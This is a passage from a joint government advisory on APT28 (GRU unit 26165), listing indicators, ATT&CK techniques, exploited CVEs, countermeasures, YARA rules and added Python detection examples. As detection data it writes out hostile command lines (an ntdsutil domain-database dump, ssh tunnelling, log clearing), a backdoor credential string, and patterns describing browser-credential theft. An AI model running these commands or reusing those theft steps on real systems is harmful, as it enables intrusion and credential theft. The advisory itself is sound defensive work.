    Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly. See the joint guide, Identifying and Mitigating Living Off the Land Techniques, for guidance on developing a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques.

    Malicious scripts

    • Certipy – An open source python tool for enumerating and abusing Active Directory Certificate Services
    • Get-GPPPassword.py – An open source python script for finding insecure passwords stored in Group Policy Preferences
    • ldap-dump.py – A script for enumerating user accounts and other information in Active Directory
    • Hikvision backdoor string: “YWRtaW46MTEK”

    Suspicious command lines

    While the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise:

    • edge.exe “-headless-new -disable-gpu”
    • ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit
    • ssh -Nf
    • schtasks /create /xml
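
    A hunting check over process-creation records for the command lines listed above, as an added example that is not part of the advisory: each pattern maps to one of the listed command lines, and a baseline of (user, executable) pairs downgrades routine administrative use to "review" instead of "alert", which is the kind of additional heuristic the Legitimate utilities note calls for. The hosts, users, paths, sample records and baseline are constructed assumptions.

```python
"""Added example, not part of the advisory: match the suspicious command lines
listed in the advisory against constructed process-creation records and
suppress routine administrative use with a baseline of (user, executable) pairs.
Hosts, users and paths below are constructed."""
import re

# One pattern per command line listed in the advisory. ssh flags are
# case-sensitive (-Nf), so that pattern does not use re.I.
SUSPICIOUS_PATTERNS = {
    "ntdsutil-ifm-dump": re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b.*\bcreate full\b", re.I),
    "wevtutil-clear-log": re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I),
    "schtasks-create-from-xml": re.compile(r"\bschtasks(\.exe)?\s+/create\b.*\s/xml\b", re.I),
    "ssh-background-no-command": re.compile(r"\bssh(\.exe)?\b.*\s-Nf\b"),
    "edge-headless": re.compile(r"\b(ms)?edge(\.exe)?\b.*-?-headless", re.I),
}


def image_name(command_line):
    """Executable basename without .exe, for quoted full paths or bare names."""
    first = command_line.strip()
    if first.startswith('"'):
        first = first[1:].split('"', 1)[0]
    else:
        first = first.split(None, 1)[0]
    name = first.rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def hunt(records, baseline):
    """Return one finding per matching record. A (user, image) pair present in
    the baseline is reported with severity "review" rather than "alert"."""
    findings = []
    for rec in records:
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(rec["command_line"]):
                routine = (rec["user"], image_name(rec["command_line"])) in baseline
                findings.append({
                    "rule": rule,
                    "host": rec["host"],
                    "user": rec["user"],
                    "severity": "review" if routine else "alert",
                })
    return findings


# Constructed process-creation records (what a 4688 or Sysmon event 1 would carry).
SAMPLE_RECORDS = [
    {"host": "DC01", "user": "CORP\\svc_backup",
     "command_line": r'C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\Backup\ntds" quit quit'},
    {"host": "DC01", "user": "CORP\\jdoe",
     "command_line": r'C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\abc" quit quit'},
    {"host": "WS07", "user": "CORP\\jdoe", "command_line": "wevtutil cl Security"},
    {"host": "WS07", "user": "CORP\\jdoe",
     "command_line": r"schtasks /create /xml C:\Users\jdoe\AppData\Local\Temp\t.xml /tn Updater"},
    {"host": "WS07", "user": "CORP\\jdoe", "command_line": "ssh.exe -Nf svc@203.0.113.9"},
    {"host": "WS07", "user": "CORP\\jdoe", "command_line": "msedge --headless=new --disable-gpu"},
    {"host": "WS03", "user": "CORP\\asmith",
     "command_line": r'"C:\Program Files\Microsoft\Edge\msedge.exe" --profile-directory=Default'},
]

# Constructed baseline: the backup service account is expected to run ntdsutil IFM.
BASELINE = {("CORP\\svc_backup", "ntdsutil")}


if __name__ == "__main__":
    for finding in hunt(SAMPLE_RECORDS, BASELINE):
        print(finding)
```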

    Outlook CVE Exploitation IOCs

    Commonly Used Webmail Providers

    • portugalmail[.]pt
    • mail-online[.]dk
    • email[.]cz
    • seznam[.]cz

    Malicious Archive Filenames Involving CVE-2023-38831

    • calc.war.zip
    • news_week_6.zip
    • Roadmap.zip
    • SEDE-PV-2023-10-09-1_EN.zip
    • war.zip
    • Zeyilname.zip

    Brute Forcing IP Addresses

    Disclaimer: These IP addresses date June 2024 through August 2024. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.

    Detections

    Customized NTLM listener

    rule APT28_NTLM_LISTENER {
        meta:
            description = "Detects NTLM listeners including APT28's custom one"
        strings:
            $command_1 = "start-process powershell.exe -WindowStyle hidden"
            $command_2 = "New-Object System.Net.HttpListener"
            $command_3 = "Prefixes.Add('http://localhost:8080/')"
            $command_4 = "-match 'Authorization'"
            $command_5 = "GetValues('Authorization')"
            $command_6 = "Request.RemoteEndPoint.Address.IPAddressToString"
            $command_7 = "@(0x4e,0x54,0x4c,0x4d, 0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x01,0x82,0x00,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)"
            $command_8 = ".AllKeys"

            $variable_1 = "$NTLMAuthentication" nocase
            $variable_2 = "$NTLMType2" nocase
            $variable_3 = "$listener" nocase
            $variable_4 = "$hostip" nocase
            $variable_5 = "$request" nocase
            $variable_6 = "$ntlmt2" nocase
            $variable_7 = "$NTLMType2Response" nocase
            $variable_8 = "$buffer" nocase
        condition:
            5 of ($command_*)
            or
            all of ($variable_*)
    }

    HEADLACE shortcut

    rule APT28_HEADLACE_SHORTCUT {
        meta:
            description = "Detects the HEADLACE backdoor shortcut dropper. Rule is meant for threat hunting."
        strings:
            $type = "[InternetShortcut]" ascii nocase
            $url  = "file://"
            $edge = "msedge.exe"
            $icon = "IconFile"
        condition:
            all of them
    }

    HEADLACE credential dialogbox phishing 

    rule APT28_HEADLACE_CREDENTIALDIALOG {
        meta:
            description = "Detects scripts used by APT28 to lure user into entering credentials"
        strings:
            $command_1 = "while($true)"
            $command_2 = "Get-Credential $(whoami)"
            $command_3 = "Add-Content"
            $command_4 = ".UserName"
            $command_5 = ".GetNetworkCredential().Password"
            $command_6 = "GetNetworkCredential().Password.Length -ne 0"
        condition:
            5 of them
    }

    HEADLACE core script

    rule APT28_HEADLACE_CORE {
        meta:
            description = "Detects HEADLACE core batch scripts"
        strings:
            $chcp = "chcp 65001" ascii
            $headless = "start \"\" msedge --headless=new --disable-gpu" ascii

            $command_1 = "taskkill /im msedge.exe /f" ascii
            $command_2 = "whoami>\"%programdata%\\" ascii
            $command_3 = "timeout" ascii
            $command_4 = "copy \"%programdata%\\" ascii
            $non_generic_del_1 = "del /q /f \"%programdata%\\" ascii
            $non_generic_del_3 = "del /q /f \"%userprofile%\\Downloads" ascii

            $generic_del = "del /q /f" ascii
        condition:
            (
                $chcp
                and
                $headless
            )
            and
            (
                1 of ($non_generic_del_*)
                or
                ($generic_del)
                or
                3 of ($command_*)
            )
    }

    MASEPIE

    rule APT28_MASEPIE {
        meta:
            description = "Detects MASEPIE python script"
        strings:
            $masepie_unique_1 = "os.popen('whoami').read()"
            $masepie_unique_2 = "elif message == 'check'"
            $masepie_unique_3 = "elif message == 'send_file':"
            $masepie_unique_4 = "elif message == 'get_file'"
            $masepie_unique_5 = "enc_mes('ok'"
            $masepie_unique_6 = "Bad command!'.encode('ascii'"
            $masepie_unique_7 = "{user}{SEPARATOR}{k}"
            $masepie_unique_8 = "raise Exception(\"Reconnect"
        condition:
            3 of ($masepie_unique_*)
    }

    STEELHOOK

    rule APT28_STEELHOOK {
        meta:
            description = "Detects APT28's STEELHOOK powershell script"
        strings:
            $s_1 = "$($env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Local State)"
            $s_2 = "$($env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data)"
            $s_3 = "$($env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Local State)"
            $s_4 = "$($env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Login Data)"
            $s_5 = "os_crypt.encrypted_key"
            $s_6 = "System.Security.Cryptography.DataProtectionScope"
            $s_7 = "[system.security.cryptography.protectdata]::Unprotect"
            $s_8 = "Invoke-RestMethod"
        condition:
            all of them
    }

    PSEXEC

    rule GENERIC_PSEXEC {
        meta:
            description = "Detects SysInternals PSEXEC executable"
        strings:
            $sysinternals_1 = "SYSINTERNALS SOFTWARE LICENCE TERMS"
            $sysinternals_2 = "/accepteula"
            $sysinternals_3 = "Software\\Sysinternals"
            $network_1 = "%s\\IPC$"
            $network_2 = "%s\\ADMIN$\\%s"
            $network_3 = "\\Device\\LanmanRedirector\\%s\\ipc$"
            $psexec_1 = "PSEXESVC"
            $psexec_2 = "PSEXEC-{}-"
            $psexec_3 = "Copying %s to %s..."
            $psexec_4 = "gPSINFSVC"
        condition:
            (
                ( uint16( 0x0 ) == 0x5a4d )
                and
                ( uint16( uint32( 0x3c )) == 0x4550 )
            )
            and
                filesize < 1024KB
            and
            (
                ( any of ($sysinternals_*) and any of ($psexec_*) )
                or
                ( 2 of ($network_*) and 2 of ($psexec_*) )
            )
    }

    The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to GRU unit 26165 cyber actors. While not all encompassing, the following are the most notable threat group names associated with MITRE ATT&CK group G0007 and commonly used within the cybersecurity community:

    • APT28 [14]
    • Fancy Bear [14]
    • Forest Blizzard [14]
    • Blue Delta [15]

    Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.

    Further Reference

    To search for the presence of malicious email messages targeting CVE-2023-23397, network defenders may consider using the script published by Microsoft: https://aka.ms/CVE-2023-23397ScriptDoc

    For the Impacket TTP, network defenders may consider using the following publicly available Impacket YARA detection rule:
    https://github.com/Neo23x0/signature-base/blob/master/yara/gen_impacket_tools.yar

    Works Cited

    [1] Microsoft. Defending Ukraine: Early Lessons from the Cyber War. 2022. https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/  
    [2] FBI et al. Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations. 2024. https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF   
    [3] NSA et al. Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. 2021. https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF 
    [4] ANSSI. Campagnes d'attaques du mode opératoire APT28 depuis 2021. 2023. https://cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/  
    [5] ANSSI. Targeting and compromise of French entities using the APT28 intrusion set. 2025. https://cert.ssi.gouv.fr/cti/CERTFR-2025-CTI-007/
    [6] Polish Cyber Command. Detecting Malicious Activity Against Microsoft Exchange Servers. 2023. https://www.wojsko-polskie.pl/woc/articles/aktualnosci-w/detecting-malicious-activity-against-microsoft-exchange-servers/ 
    [7] IBM. Israel-Hamas Conflict Lures to Deliver Headlace Malware. 2023. https://securityintelligence.com/x-force/itg05-ops-leverage-israel-hamas-conflict-lures-to-deliver-headlace-malware/ 
    [8] CERT-UA. APT28: From Initial Attack to Creating Domain Controller Threats in an Hour. 2023. https://cert.gov.ua/article/6276894 
    [9] NSA. Embracing a Zero Trust Security Model. 2021. https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF  
    [10] NSA et al. Keeping PowerShell: Security Measures to Use and Embrace. 2022. https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF 
    [11] National Institute of Standards and Technology (NIST). Special Publication 800-63B: Digital Identity Guidelines – Authentication and Lifecycle Management. 2020. https://pages.nist.gov/800-63-3/sp800-63b.html 
    [12] NSA. Selecting Secure Multi-factor Authentication Solutions. October 16, 2020. https://media.defense.gov/2024/Jul/31/2003515137/-1/-1/0/MULTIFACTOR_AUTHENTICATION_SOLUTIONS_UOO17091520.PDF  
    [13] NSA and CISA. NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. 2023. https://media.defense.gov/2023/Oct/05/2003314578/-1/-1/0/JOINT_CSA_TOP_TEN_MISCONFIGURATIONS_TLP-CLEAR.PDF
    [14] Department of Justice. Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU). 2024. https://www.justice.gov/archives/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian
    [15] Recorded Future. GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns. 2024. https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf

    Disclaimer of endorsement

    The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

    Purpose

    This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

    Contact

    United States organizations

    • National Security Agency (NSA)
    • Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)
      • U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA via the agency’s Incident Reporting System, its 24/7 Operations Center (report@cisa.gov or 888-282-0870), or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
    • Department of Defense Cyber Crime Center (DC3)

    United Kingdom organizations

    Germany organizations

    Czech Republic organizations

    Poland organizations

    Australian organizations

    • Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.

    Canadian organizations

    Estonia organizations

    French organizations

    • French organizations are encouraged to report suspicious activity or incidents related to information found in this advisory by contacting ANSSI/CERT-FR by email at cert-fr@ssi.gouv.fr or by phone at 3218 or +33 9 70 83 32 18.

    See Table 2 through Table 14 for all the threat actor tactics and techniques referenced in this advisory.

    Table 2: Reconnaissance
    Tactic/Technique Title ID Use
    Reconnaissance TA0043 Conducted reconnaissance on at least one entity involved in the production of ICS components for railway management.
    Gather Victim Identity Information: Email Addresses T1589.002 Conducted contact information reconnaissance to identify additional targets in key positions.
    Gather Victim Org Information T1591 Conducted reconnaissance of the cybersecurity department.
    Gather Victim Org Information: Identify Roles T1591.004 Conducted reconnaissance of individuals responsible for coordinating transport.
    Gather Victim Org Information: Business Relationships T1591.002 Conducted reconnaissance of other companies cooperating with the victim entity.
    Gather Victim Host Information T1592 Attempted to enumerate Real Time Streaming Protocol (RTSP) servers hosting IP cameras.
    Table 3: Resource development
    Tactic/Technique Title ID Use
    Compromise Accounts: Email Accounts T1586.002 Sent phishing emails using compromised accounts.
    Compromise Accounts: Cloud Accounts T1586.003 Sent phishing emails using compromised accounts.
    Table 4: Initial Access
    Tactic/Technique Title ID Use
    Trusted Relationship T1199 Conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access.
    Phishing T1566 Used spearphishing for credentials and delivering malware to gain initial access to targeted entities.
    Phishing: Spearphishing Attachment T1566.001 Sent emails with malicious attachments.
    Phishing: Spearphishing Link T1566.002 Used spearphishing with included links to fake login pages. Sent emails with embedded hyperlinks that downloaded a malicious archive.
    Phishing: Spearphishing Voice T1566.004 Attempted to use voice phishing to gain access to privileged accounts by impersonating IT staff.
    External Remote Services T1133 Exploited Internet-facing infrastructure, including corporate VPNs, to gain initial access to targeted entities.
    Exploit Public-Facing Application T1190 Exploited public vulnerabilities and SQL injection to gain initial access to targeted entities.
    Content Injection T1659 Leveraged a WinRAR vulnerability allowing for the execution of arbitrary code embedded in an archive.
    Table 5: Execution
    Tactic/Technique Title ID Use
    User Execution: Malicious Link T1204.001 Used malicious links to hosted shortcuts in spearphishing.
    User Execution: Malicious File T1204.002 Delivered malware executables via spearphishing.
    Scheduled Task/Job: Scheduled Task T1053.005 Used scheduled tasks to establish persistence.
    Command and Scripting Interpreter T1059 Delivered scripts in spearphishing. Executed arbitrary shell commands.
    Command and Scripting Interpreter: PowerShell T1059.001 PowerShell commands were often used to prepare data for exfiltration.
    Command and Scripting Interpreter: Windows Command Shell T1059.003 Used BAT script in spearphishing.
    Command and Scripting Interpreter: Visual Basic T1059.005 Used VBScript in spearphishing.
    Command and Scripting Interpreter: Python T1059.006 Installed python on infected machines to enable the execution of Certipy.
    Table 6: Persistence
    Tactic/Technique Title ID Use
    Account Manipulation: Additional Email Delegate Permissions  Used manipulation of mailbox permissions to establish sustained email collection.
    Modify Authentication Process: Multi-Factor Authentication  Enrolled compromised accounts in MFA mechanisms to increase the trust level of compromised accounts and enable sustained access.
    Hijack Execution Flow: DLL Search Order Hijacking T1574.001 Used DLL search order hijacking to facilitate malware execution.
    Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 Used run keys to establish persistence.
    Boot or Logon Autostart Execution: Shortcut Modification T1547.009 Placed malicious shortcuts in the startup folder to establish persistence.
    Table 7: Defense Evasion
    Tactic/Technique Title ID Use
    Indicator Removal: Clear Windows Event Logs T1070.001 Deleted event logs through the wevtutil utility.
    Table 8: Credential Access
    Tactic/Technique Title ID Use
    Brute Force  Sent requests with Base64-encoded credentials for the RTSP server, which included publicly documented default credentials, and likely were generic attempts to brute force access to the devices.
    Brute Force: Password Guessing  Used credential guessing to gain initial access to targeted entities.
    Brute Force: Password Spraying  Used brute force to gain initial access to targeted entities. Conducted a brute force password spray via LDAP.
    Multi-Factor Authentication Interception  Used multi-stage redirectors to provide MFA relaying capabilities in some campaigns.
    Input Capture  Used multi-stage redirectors to provide CAPTCHA relaying capabilities in some campaigns.
    Forced Authentication  Used an Outlook NTLM vulnerability to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations.
    OS Credential Dumping: NTDS  Attempted to dump Active Directory NTDS.dit domain databases.
    Unsecured Credentials: Group Policy Preferences  Retrieved plaintext passwords via Group Policy Preferences using Get-GPPPassword.py.

    Table 9: Discovery
    Tactic/Technique Title ID Use

    Account Discovery: Domain Account

    T1087.002

    Used a modified ldap-dump.py to enumerate the Windows environment.

    Table 10: Command and Control
    Tactic/Technique Title ID Use

    Hide Infrastructure 

    T1665 

    Abused SOHO devices to facilitate covert cyber operations, as well as proxy malicious activity, via devices with geolocation in proximity to the target. 

    Proxy: External Proxy 

    T1090.002 

    Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers. 

    Proxy: Multi-hop Proxy 

    T1090.003 

    Used Tor and commercial VPNs as part of their anonymization infrastructure 

    Encrypted Channel 

    T1573 

    Connected to victim infrastructure using encrypted TLS. 

    Multi-Stage Channels 

    T1104 

    Used multi-stage redirectors for campaigns. 

    Table 11: Defense Evasion (mobile framework)
    Tactic/Technique Title ID Use
    Execution Guardrails  Used multi-stage redirectors to verify browser fingerprints in some campaigns.
    Execution Guardrails: Geofencing  Used multi-stage redirectors to verify IP geolocation in some campaigns.

    Table 12: Lateral Movement
    Tactic/Technique Title ID Use
    Lateral Movement  Used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment.
    Remote Services: Remote Desktop Protocol  Moved laterally within the network using RDP.

    Table 13: Collection
    Tactic/Technique Title ID Use

    Email Collection 

    Retrieved sensitive data from email servers. 

    Email Collection: Remote Email Collection 

    Used server data exchange protocols and APIs such as Exchange Web Services (EWS) and IMAP to exfiltrate data from email servers. 

    Automated Collection 

    Used periodic EWS queries to collect new emails. 

    Video Capture 

    Attempted to gain access to the cameras’ feeds. 

    Archive Collected Data 

    Accessed files were archived in .zip files prior to exfiltration. 

    Archive Collected Data: Archive via Utility 

    Prepared zip archives for upload to the actors’ infrastructure. 

    Table 14: Exfiltration
    Tactic/Technique Title ID Use

    Exfiltration Over Alternative Protocol 

    Attempted to exfiltrate archived data via a previously dropped OpenSSH binary. 

    Scheduled Transfer 

    Used periodic EWS queries to collect new emails sent and received since the last data exfiltration. 

    Appendix B: CVEs exploited

    Table 15: Exploited CVE information
    CVE  Vendor/Product  Details
    RARLAB WinRAR  Allows execution of arbitrary code when a user attempts to view a benign file within a ZIP archive.
    Microsoft Outlook  External actors could send specially crafted emails that cause a connection from the victim to an untrusted location under the actor’s control, leaking the Net-NTLMv2 hash of the victim, which the actor could then relay to another service to authenticate as the victim.
    Roundcube Webmail  Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search params.
    Roundcube Webmail  An XSS issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16 and 1.4.x before 1.4.10, where a plaintext email message with JavaScript in a link reference element is mishandled by linkref_addindex in rcube_string_replacer.php.
    Roundcube Webmail  Roundcube Webmail before 1.4.4 allows arbitrary code execution via shell metacharacters in a configuration setting for im_convert_path or im_identify_path in rcube_image.php.

    Appendix C: MITRE D3FEND Countermeasures

    Table 16: MITRE D3FEND countermeasures
    Countermeasure Title  ID  Details
    Network Isolation  Employ appropriate network segmentation. Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers.
    Access Mediation  Limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions. Configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access.
    Inbound Traffic Filtering  Implement host firewall rules to block connections from other devices on the network, other than from authorized management devices and servers, to prevent lateral movement.
    Resource Access Pattern Analysis  Use automated tools to audit access logs for security concerns and identify anomalous access requests.
    Outbound Traffic Filtering  Block NTLM/SMB requests to external infrastructure.
    Platform Monitoring  Install EDR/logging/cybersecurity solutions onto high value systems with large amounts of sensitive data such as mail servers and domain controllers.
    System File Analysis  Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly.
    Application Hardening  Enable optional security features in Windows to harden endpoints and mitigate initial access techniques.
    Application-based Process Isolation  Enable attack surface reduction rules to prevent executable content from email.
    Executable Allowlisting  Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA%.
    Execution Isolation  Unless users are involved in the development of scripts, limit the execution of scripts (such as batch, JavaScript, and PowerShell) to known scripts.
    Application Configuration Hardening  Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode. Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication. Turn off other ports/services not in use (e.g., FTP, web interface, etc.).
    Process Spawn Analysis  Use open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters.
    URL Reputation Analysis  Use services that provide enhanced browsing services and safe link checking.
    Network Access Mediation  Do not allow incoming traffic, especially logins to systems, from public VPN services. Where possible, logins from public VPNs, including exit nodes in the same country as target systems, should be blocked or, if allowed, alerted on for further investigation. Ensure cameras and other Internet of Things devices are protected by a security appliance, if possible.
    DNS Denylisting  Do not allow outgoing traffic to hosting and API mocking services frequently used by malicious actors.
    Domain Name Reputation Analysis  Heuristic detections for web requests to new subdomains may uncover malicious phishing activity. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.
    Multi-factor Authentication  Use MFA with strong factors and require regular re-authentication, especially for management accounts.
    Job Function Access Pattern Analysis  Implement other mitigations for privileged accounts, including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts.
    User Account Permissions  Separate privileged accounts by role and alert on misuse of privileged accounts. Audit user accounts on all devices to ensure they are an accurate reflection of your organization and that they are being used as expected.
    Token-based Authentication  Reduce reliance on passwords; instead, consider using services like single sign-on.
    Credential Hardening  Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts.
    Authentication Event Thresholding  Use account throttling or account lockout. Throttling progressively increases the time delay between successive login attempts. If using account lockout, allow between 5 and 10 attempts before lockout.
    Strong Password Policy  Use a service to check for compromised passwords before using them.
    Credential Rotation  Change all default credentials.
    Encrypted Tunnels  Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols). Use a VPN for remote connections to devices.
    Software Update  Apply security patches and firmware updates to all devices. Ensure devices are currently supported. Replace devices that are end-of-life.
    Agent Authentication  Ensure authentication is enabled for remote access to devices. If supported on IP cameras, enable authenticated RTSP access only.
    User Behavior Analysis  Review all authentication activity for remote access to make sure it is valid and expected. Investigate any unexpected or unusual activity.
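    Two of the countermeasures above (System File Analysis and Authentication Event Thresholding) map directly onto techniques in Table 7 (T1070.001, log clearing via wevtutil) and Table 8 (password spraying). The following detection logic is an added example written for this page, not code from the advisory or its authoring agencies; the "TIMESTAMP key=value" log line format is an assumption, while the field names follow Windows event XML and the event IDs (1102, 104, 4688, 4625) are the standard Windows ones. The sample events are constructed.

```python
"""Added example (not from the advisory): detection logic for two behaviours
listed in the ATT&CK tables above, run over constructed sample Windows events.
  - T1070.001 Indicator Removal: Clear Windows Event Logs (wevtutil)
  - T1110.003 Brute Force: Password Spraying
The 'TIMESTAMP key=value ...' line format is an assumption; the field names
follow Windows event XML and the event IDs are the standard Windows ones."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LOG_CLEARED_IDS = {1102, 104}  # 1102: Security audit log cleared; 104: System log cleared
PROCESS_CREATED = 4688         # process creation (command line needs audit policy enabled)
LOGON_FAILED = 4625            # failed logon

_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse one 'TIMESTAMP key=value ...' line; values may be double-quoted."""
    ts, _, rest = line.strip().partition(" ")
    ev = {"Time": datetime.fromisoformat(ts.replace("Z", "+00:00"))}
    for key, val in _FIELD.findall(rest):
        ev[key] = val.strip('"')
    ev["EventID"] = int(ev["EventID"])
    return ev


def load_events(text):
    return [parse_event(ln) for ln in text.strip().splitlines() if ln.strip()]


def detect_log_clearing(events):
    """T1070.001: alert on log-cleared events and on wevtutil clearing a log.
    Each alert is (rule, host, user)."""
    alerts = []
    for ev in events:
        if ev["EventID"] in LOG_CLEARED_IDS:
            alerts.append(("event-log-cleared", ev["Computer"], ev.get("SubjectUserName")))
        elif ev["EventID"] == PROCESS_CREATED:
            image = ev.get("NewProcessName", "").lower()
            args = ev.get("CommandLine", "").lower().split()
            # Sigma-style process check: wevtutil.exe invoked with the 'cl'/'clear-log' verb
            if image.endswith("wevtutil.exe") and {"cl", "clear-log"} & set(args):
                alerts.append(("wevtutil-clear-log", ev["Computer"], ev.get("SubjectUserName")))
    return alerts


def detect_password_spray(events, window=timedelta(minutes=10),
                          min_accounts=5, max_per_account=2):
    """T1110.003: one source IP failing against many accounts, few tries each,
    within a sliding time window. Low-and-slow spraying stays under per-account
    lockout thresholds, so the rule keys on distinct accounts, not attempt count.
    Each alert is (rule, source_ip, distinct_accounts)."""
    by_source = defaultdict(list)
    for ev in events:
        if ev["EventID"] == LOGON_FAILED:
            by_source[ev["IpAddress"]].append(ev)
    alerts = []
    for src, fails in by_source.items():
        fails.sort(key=lambda e: e["Time"])
        start = 0
        for end in range(len(fails)):
            while fails[end]["Time"] - fails[start]["Time"] > window:
                start += 1
            per_account = Counter(e["TargetUserName"].lower() for e in fails[start:end + 1])
            if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
                alerts.append(("password-spray", src, len(per_account)))
                break  # one alert per source is enough
    return alerts


# Constructed sample events (hosts, users and addresses are made up for this example).
SAMPLE_LOG = r"""
2025-05-20T10:00:01Z EventID=4688 Computer=WS01 SubjectUserName=jdoe NewProcessName=C:\Windows\System32\wevtutil.exe CommandLine="wevtutil qe Security /c:5"
2025-05-20T10:05:09Z EventID=4688 Computer=WS01 SubjectUserName=svc_backup NewProcessName=C:\Windows\System32\wevtutil.exe CommandLine="wevtutil cl Security"
2025-05-20T10:05:10Z EventID=1102 Computer=WS01 SubjectUserName=svc_backup
2025-05-20T11:00:00Z EventID=4625 Computer=DC01 TargetUserName=alice IpAddress=203.0.113.7
2025-05-20T11:00:30Z EventID=4625 Computer=DC01 TargetUserName=bob IpAddress=203.0.113.7
2025-05-20T11:01:00Z EventID=4625 Computer=DC01 TargetUserName=carol IpAddress=203.0.113.7
2025-05-20T11:01:30Z EventID=4625 Computer=DC01 TargetUserName=dave IpAddress=203.0.113.7
2025-05-20T11:02:00Z EventID=4625 Computer=DC01 TargetUserName=erin IpAddress=203.0.113.7
2025-05-20T11:02:30Z EventID=4625 Computer=DC01 TargetUserName=frank IpAddress=203.0.113.7
2025-05-20T11:03:00Z EventID=4625 Computer=DC01 TargetUserName=alice IpAddress=203.0.113.7
2025-05-20T11:10:00Z EventID=4625 Computer=DC01 TargetUserName=bob IpAddress=198.51.100.5
2025-05-20T11:10:20Z EventID=4625 Computer=DC01 TargetUserName=bob IpAddress=198.51.100.5
2025-05-20T11:10:40Z EventID=4625 Computer=DC01 TargetUserName=bob IpAddress=198.51.100.5
"""

if __name__ == "__main__":
    events = load_events(SAMPLE_LOG)
    for alert in detect_log_clearing(events) + detect_password_spray(events):
        print(alert)
```

    The benign `wevtutil qe` query and the three failures from 198.51.100.5 against a single account do not alert, which is the distinction the thresholding countermeasure relies on.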


